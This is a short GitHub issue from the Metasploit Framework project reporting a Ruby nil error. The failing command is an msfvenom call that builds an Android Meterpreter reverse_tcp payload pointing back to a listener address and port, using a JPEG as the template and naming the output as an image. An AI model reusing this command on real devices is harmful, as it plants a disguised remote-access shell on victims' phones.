### ISSUE TITLE
Error: undefined method `[]' for nil:NilClass

### ISSUE THREAD

**Issue by kumaraguru1735** [rapid7/metasploit-framework#10667]
┌─[sam@parrot]─[~/Desktop]
└──╼ $sudo msfvenom -a x64 --platform android --arch dalvik -x /root/Downloads/2.jpeg -p android/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=4444 -o any.jpeg
[sudo] password for sam: 
Using APK template: /root/Downloads/2.jpeg
Error: undefined method `[]' for nil:NilClass

**Comment by Green-m** [comment]
See https://github.com/rapid7/metasploit-framework/issues/10656
